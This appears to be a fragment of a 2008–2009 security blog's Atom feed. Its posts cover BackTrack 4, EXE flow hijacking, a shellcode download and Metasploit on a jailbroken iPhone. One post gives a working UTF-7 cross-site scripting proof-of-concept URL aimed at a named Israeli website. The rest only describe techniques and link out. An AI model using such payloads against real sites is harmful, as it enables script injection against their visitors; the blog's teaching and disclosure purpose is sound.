released</title><content type='html'>BT4 - New &amp; improved version, The best so far......another great work by the remote exploit team. some new and exciting features. The most significant of these changes is the expansion from the realm of a Pentesting LiveCD towards a full blown "Distribution". &lt;br /&gt;&lt;br /&gt;DOWNLOAD: &lt;a href="http://www.remote-exploit.org/backtrack_download.html "&gt;BackTrack 4 Beta &lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-6833088136415840459?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/6833088136415840459/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=6833088136415840459' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/6833088136415840459'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/6833088136415840459'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2009/02/backtrack-4-beta-released.html' title='BackTrack 4 Beta released'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-470853369979148815</id><published>2008-07-20T06:38:00.000-07:00</published><updated>2008-07-20T06:52:20.882-07:00</updated><title type='text'>Flow hiJACKing</title><content type='html'>&lt;span style="line-height: 115%;font-family:&amp;quot;;font-size:11;"  &gt;&lt;br /&gt;&lt;span style="font-family:arial;"&gt;Application flow hijacking is one of the popular methods to infect EXE files, by the use of this method one can inject malicious \xHEXa code into application code section and then ask the instruction pointer to execute it as a part of the original code. Read More here...&lt;/span&gt;&lt;/span&gt;&lt;a style="font-family: arial;" href="http://www.hackingdefined.com/articles/Flow_hiJACKing.pdf"&gt; hiJACKing&lt;/a&gt;&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-470853369979148815?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/470853369979148815/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=470853369979148815' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/470853369979148815'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/470853369979148815'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2008/07/flow-hijacking.html' title='Flow hiJACKing'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-8938412755139463482</id><published>2008-07-12T23:26:00.000-07:00</published><updated>2009-05-17T12:37:16.662-07:00</updated><title type='text'>Tools In The Box</title><content type='html'>New / 0ld applications in the tools section......&lt;span style="font-weight: bold;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span&gt;&lt;a href="http://www.hackingdefiend.com/shellcode/super.exe"&gt;&lt;span style="font-weight: bold;"&gt;Super ShellCode&lt;/span&gt;&lt;/a&gt; - Superman shell code sound track. Isntead of running calc as a shell code I decided to code my own super rintchi shell code. open the file with olly and copy/use the relevant code as a shell code.&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;a href="http://www.hackingdefined.com/NetListener.msi"&gt;ShareWatcher &lt;/a&gt;&lt;/span&gt;- A small .NET application that will watch &lt;a href="http://en.wikipedia.org/wiki/NetBIOS"&gt;NetBios&lt;/a&gt; connection to your PC. It will alert and log all connections.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.hackingdefined.com/traffic-viewer.rar"&gt;&lt;span style="font-weight: bold;"&gt;TrafficViewer  &lt;/span&gt;&lt;/a&gt;- Israeli &lt;a href="http://www.ayalonhw.co.il/template/default.asp?maincat=3&amp;amp;catId=2&amp;amp;pageId=17"&gt;road cameras&lt;/a&gt; (watch 8 cams in one window).&lt;br /&gt;&lt;br /&gt;PS Whats that? data = google.doGoogleSearch(query,maxResults=20)&lt;br /&gt;&lt;br /&gt;Enjoy.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-8938412755139463482?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/8938412755139463482/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=8938412755139463482' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/8938412755139463482'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/8938412755139463482'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2008/07/tools-in-box.html' title='Tools In The Box'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-2959949072279166214</id><published>2008-07-08T01:28:00.000-07:00</published><updated>2008-07-08T02:04:33.927-07:00</updated><title type='text'>XSS UTF-7</title><content type='html'>Lament (my best student so far....) discovered a new &lt;a href="http://seclists.org/bugtraq/2008/May/0109.html"&gt;XSS vulnerability in Apache server&lt;/a&gt; (two months ago and still unfixed). read about Cross-site Scripting &lt;a href="http://en.wikipedia.org/wiki/Cross-site_scripting"&gt;here.&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;This vulnerability can show us that we can`t blindly TRUST links from known domain names. In the following &lt;span style="font-weight: bold;"&gt;POC &lt;/span&gt;we can see that walla.co.il is vulnerable just like all the other websites that running Apache server.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;POC&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;Open new Explorer and paste the following link:&lt;br /&gt;&lt;br /&gt;http://www.walla.co.il/Znl5g3k70ZaBUPYmN5RAGUdkskoprzGI63K4mIj2sqz&lt;br /&gt;bX0Kc3Fu7vfthepWhmKvjudPuJTNeK9zw5MaZ1yXJi8RJRRuPe5UahFwOblM&lt;br /&gt;XsIPTGh3pVjTLdim3vuTKgdazOG9idQbIjbnpMEco8Zlo5xNRuCoviPx7x7tYYe&lt;br /&gt;Ogc8HU46gaecJwnHY7f6GlQB8H6kBFhjoIaHE1SQPhU5VReCz1olPh5jZ%3Cfont&lt;br /&gt;%20size=50%3EDEFACED%3C!xc+ADw-script+AD4-alert('I XSSedYOU!!!')+ADw-/script+AD4---//--&lt;br /&gt;&lt;br /&gt;Next, right click on the page and change encoding to auto select. BOOM. A message box should be opened now.&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;&lt;/span&gt;&lt;br /&gt;Conclusion, if you recieve a long encrypted link just dont open it. BE AWARE.&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-2959949072279166214?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/2959949072279166214/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=2959949072279166214' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/2959949072279166214'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/2959949072279166214'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2008/07/xss-utf-7.html' title='XSS UTF-7'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-6228830703203241821.post-4581117294169703354</id><published>2008-07-04T01:57:00.000-07:00</published><updated>2010-08-15T03:23:49.260-07:00</updated><title type='text'>iJackPhone</title><content type='html'>&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_RROvHJzP0eo/SG4AdFgLD9I/AAAAAAAAAB0/scRubDz3fIw/s1600-h/imsfcli.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5219109517862309842" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; WIDTH: 181px; CURSOR: pointer; HEIGHT: 93px" alt="" src="http://4.bp.blogspot.com/_RROvHJzP0eo/SG4AdFgLD9I/AAAAAAAAAB0/scRubDz3fIw/s200/imsfcli.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;In the last few days while been paralyzed and unable to move from bed I had time to do some cool stuff with my iPhone. It all started when my L33T H@X0R bro - &lt;a href="http://secmaniac.blogspot.com/"&gt;Muts&lt;/a&gt; invited me to join him on a iPhone journey - install &lt;a href="http://www.metasploit.com/"&gt;Metasploit &lt;/a&gt;framework on a new iPhone.&lt;br /&gt;&lt;br /&gt;First, we needed to Unlock, jailbreak and install Cydia on the iPhone. Good old &lt;a href="http://www.ziphone.org/"&gt;Ziphone&lt;/a&gt; helped us to open the iPhone for third party applications and then we installed &lt;a href="http://www.saurik.com/id/1"&gt;Cydia&lt;/a&gt; with the installer.application. Cydia is a distribution of GNU and BSD`s userspace for the iPhone. In other words, if you want to use bash, chmod, nc, passwd, su, tcpdump commands then you need Cydia.&lt;br /&gt;&lt;br /&gt;Once all packges have been installed &lt;a href="http://www.debian.org/doc/manuals/apt-howto/"&gt;apt-get&lt;/a&gt; install wget,ruby,ruby-gems we downloaded the &lt;a href="http://www.metasploit.com/framework/downloader/?id=framework-3.1.tar.gz"&gt;Metasploit&lt;/a&gt; framework to the iPhone, tar it and execute it. Fast and Simple!!!&lt;br /&gt;&lt;br /&gt;Now, I`m working on a tool that will track Calls,SMS,History and Location of the iPhone. Hopefully it will be ready before &lt;a href="http://www.blackhat.com/"&gt;BlackHat 2008&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;A sample script that logs cordination from wifi,cellular every $Time can be found &lt;a href="http://212.150.53.163/iTrackMe.sh"&gt;here&lt;/a&gt;. (still on progress)&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;REQUIREMENTS&lt;br /&gt;&lt;/strong&gt;This script is based on findLocation and &lt;a href="http://ericasadun.com/ftp/TUAW/findme/findme-muchbetter"&gt;findme-muchbetter&lt;/a&gt; scripts.&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;iPhone &lt;/span&gt;&lt;span style="font-size:78%;"&gt;Remote Shell &lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://1.bp.blogspot.com/_RROvHJzP0eo/SG46PnyuZmI/AAAAAAAAAB8/pKs3ZjCUkLk/s1600-h/shell-iphone.JPG"&gt;&lt;img id="BLOGGER_PHOTO_ID_5219173058223171170" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; CURSOR: pointer" alt="" src="http://1.bp.blogspot.com/_RROvHJzP0eo/SG46PnyuZmI/AAAAAAAAAB8/pKs3ZjCUkLk/s200/shell-iphone.JPG" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;&lt;br /&gt;&lt;br /&gt;&lt;/span&gt;&lt;span style="font-size:78%;"&gt;iPhone Terminal &lt;/span&gt;&lt;br /&gt;&lt;a onblur="try {parent.deselectBloggerImageGracefully();} catch(e) {}" href="http://4.bp.blogspot.com/_RROvHJzP0eo/SG5CZgHdsUI/AAAAAAAAACE/HZynia-JA24/s1600-h/iphone-prompt.jpg"&gt;&lt;img id="BLOGGER_PHOTO_ID_5219182024054387010" style="FLOAT: left; MARGIN: 0pt 10px 10px 0pt; CURSOR: pointer" alt="" src="http://4.bp.blogspot.com/_RROvHJzP0eo/SG5CZgHdsUI/AAAAAAAAACE/HZynia-JA24/s200/iphone-prompt.jpg" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;span style="font-size:78%;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;PS - Rintchi /me L0V3S Y0U&lt;br /&gt;&lt;br /&gt;ג'קי אלטל&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/6228830703203241821-4581117294169703354?l=4lt4l.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://4lt4l.blogspot.com/feeds/4581117294169703354/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=6228830703203241821&amp;postID=4581117294169703354' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/4581117294169703354'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/6228830703203241821/posts/default/4581117294169703354'/><link rel='alternate' type='text/html' href='http://4lt4l.blogspot.com/2008/07/ijackphone.html' title='iJackPhone'/><author><name>Jacky Altal</name><uri>http://www.blogger.com/profile/10783056673584844580</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='28' height='32' src='http://2.bp.blogspot.com/_RROvHJzP0eo/SYiDISvGOrI/AAAAAAAAACY/OfW3P_wjpoM/S220/%D7%92%27%D7%A7%D7%99+%D7%90%D7%9C%D7%98%D7%9C.JPG'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://4.bp.blogspot.com/_RROvHJzP0eo/SG4AdFgLD9I/AAAAAAAAAB0/scRubDz3fIw/s72-c/imsfcli.jpg' height='72' width='72'/><thr:total>0</thr:total></entry></feed>
